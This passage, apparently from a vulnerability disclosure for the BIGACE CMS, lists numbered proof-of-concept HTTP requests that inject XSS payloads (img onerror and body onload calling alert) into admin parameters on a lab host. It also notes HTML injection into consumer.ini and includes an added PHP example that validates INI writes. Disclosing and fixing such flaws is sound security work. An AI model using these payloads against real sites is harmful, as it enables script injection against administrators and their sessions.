POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52

start='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&amount=10&namespace=&level=
---< request >---

23. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=logging_tADMIN_len HTTP/1.1
Host: 10.149.14.52

start=1560&amount="%20body%20onload%3d"alert(4321)"%3e&namespace=&level=
---< request >---

24. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=community_tADMIN_len HTTP/1.1
Host: 10.149.14.52

s4lv09G4d=j6dbng376&o8F5hJ39y='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&kjhgzt87D=asd
---< request >---

25. xss + information disclosure
---< request >---
POST /bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len HTTP/1.1
Host: 10.149.14.52
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:22.0) Gecko/20100101 Firefox/22.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-us;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://10.149.14.52/bigace/public/index.php?cmd=admin&id=statistic_tADMIN_len
Cookie: PHPSESSID=d0mbv9u7103sdm3350bi0gepv0
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 45

mode='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX
---< request >---


26. adding new community

When you're adding a new community, you can write directly into the file
consumer.ini. This can crash your site.
root@bt:/var/www/bigace# grep -n -r -e aaaaaaaa ./
./system/config/consumer.ini:9:[aaaaaaaaaaa]


In this case, I changed the 'aaaa' string to HTML code to check if the page
will show it (as HTML, not as text). HTML injection is possible here.
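The grep output above shows the submitted community name becoming an INI section header verbatim. As an added example that is not BIGACE's code, here is the kind of guard that belongs in front of that write: the name is checked against a host-name pattern, the setting keys and values are checked, and the generated file is re-parsed before it is saved. Only the consumer.ini name comes from the report; the temp file, function names and settings are constructed.

```php
<?php
// Added example (not BIGACE code): guarding a write into an INI file such
// as consumer.ini. Function names and the settings are illustrative.

// A community name is a host name: labels of letters, digits and hyphens,
// joined by dots. Anything else ([ ] ; # = quotes, newlines, < >) could
// break the INI syntax or be rendered later as HTML.
function valid_community_name(string $name): bool
{
    $label = '[A-Za-z0-9]([A-Za-z0-9-]{0,61}[A-Za-z0-9])?';
    return strlen($name) <= 253
        && preg_match("/^{$label}(\\.{$label})*$/", $name) === 1;
}

function add_community(string $iniPath, string $name, array $settings): void
{
    if (!valid_community_name($name)) {
        throw new InvalidArgumentException('invalid community name');
    }
    $current = is_file($iniPath) ? (string) file_get_contents($iniPath) : '';
    $parsed  = parse_ini_string($current, true, INI_SCANNER_RAW);
    if ($parsed === false) {
        throw new RuntimeException('existing INI file does not parse');
    }
    if (isset($parsed[$name])) {
        throw new RuntimeException('community already exists');
    }

    $block = "\n[{$name}]\n";
    foreach ($settings as $key => $value) {
        $value = (string) $value;
        // Keys must be plain identifiers; values may not carry quotes or control chars.
        if (!preg_match('/^[A-Za-z_][A-Za-z0-9_.]*$/', $key) || preg_match('/[\x00-\x1F"]/', $value)) {
            throw new InvalidArgumentException("invalid setting: {$key}");
        }
        $block .= "{$key} = \"{$value}\"\n";
    }

    // Re-parse the candidate before touching the real file.
    $candidate = $current . $block;
    if (parse_ini_string($candidate, true, INI_SCANNER_RAW) === false) {
        throw new RuntimeException('generated INI does not parse');
    }
    file_put_contents($iniPath, $candidate, LOCK_EX);
}

// Demo with constructed inputs on a temporary file.
$tmp = tempnam(sys_get_temp_dir(), 'consumer');
add_community($tmp, 'example.com', ['sitename' => 'Example', 'default_lang' => 'en']);
foreach (['<img src=x onerror=alert(1)>', 'a]b', "x\ny"] as $bad) {
    try {
        add_community($tmp, $bad, []);
    } catch (InvalidArgumentException $e) {
        echo "rejected: ", $e->getMessage(), "\n";
    }
}
echo file_get_contents($tmp);
unlink($tmp);
```

The re-parse step is what turns "this can crash your site" into a handled error: a name or value that would corrupt the file is refused before anything is written, and the admin gets an error message instead of a broken installation.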

27. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D="%20body%20onload%3d"alert(4321)"%3e&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

28. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D='"%2f%2e%20%2f,alert(4321)%2f%2f#"%3eXXX&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---


29. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

30. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=maintenance_tADMIN_len HTTP/1.1
Host: 10.149.14.52

s4lv09G4d=u5FN80Ky&zhtf5fikj=q39854ljh&jhgf854ih='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e
---< request >---


31. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D='%3e"%3e%3cimg%2fsrc%3d"x"%2fonerror%3d"alert(4321)"%3e&data%5Bwebmastermail%5D=%40&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

32. xss
---< request >---
POST /bigace/public/index.php?cmd=admin&id=communityInstall_tADMIN_len&s4lkhkj5svr=gI8n3Els143 HTTP/1.1
Host: 10.149.14.52

data%5Bnewdomain%5D=10.149.14.52&data%5Bsitename%5D=asd&data%5Bmailserver%5D=asd&data%5Bdefault_editor%5D=fckeditor&data%5Bdefault_style%5D=standard&data%5Bdefault_lang%5D=en&data%5Bstatistics%5D=TRUE&data%5Badmin%5D=&data%5Bwebmastermail%5D='%3e"%3e%3cbody%20onload%3dalert(%2f4321%2f)%3e&data%5Bpassword%5D=&data%5Bcheck%5D=
---< request >---

Cheers o/